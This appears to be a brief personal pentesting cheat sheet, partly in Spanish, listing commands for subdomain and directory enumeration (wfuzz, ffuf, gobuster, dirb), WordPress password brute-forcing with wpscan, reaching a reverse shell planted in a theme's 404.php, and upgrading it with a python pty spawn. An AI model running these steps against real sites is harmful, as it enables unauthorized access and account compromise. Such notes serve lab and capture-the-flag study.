ENUMERACIÖN DE SUBDOMINIOS:
assetfinder --subs-only pagina 
wfuzz -c -z file,'diccionario' -u 'target' -H 'HOST:FUZZ.target'

ENUMERACIÖN DE DIRECTORIOS:
dirb target

############Ffuf:
ffuf -u <target_url>/FUZZ -w <wordlist_file> -e .<extension>

ffuf -u <target_url>/FUZZ -w <wordlist_file> -e <extension> -mc 200
########## Gobuster
Easy search
gobuster dir -u "url" -w "diccionario"

add files with extensions

gobuster dir -u <target_url> -w <wordlist_file> -x <extension>


###################################################### wpscan
wpscan -url "" 
wpscan -url "" --usernames "" --passwords "dictio"



acceder a la pagina php con la shell
http://"ip o url"/wp-content/themes/"tema"/404.php

si la reverse shell es la monkey, para migrar a una shell más estable:
python -c 'import pty;pty.spawn("/bin/bash")' 



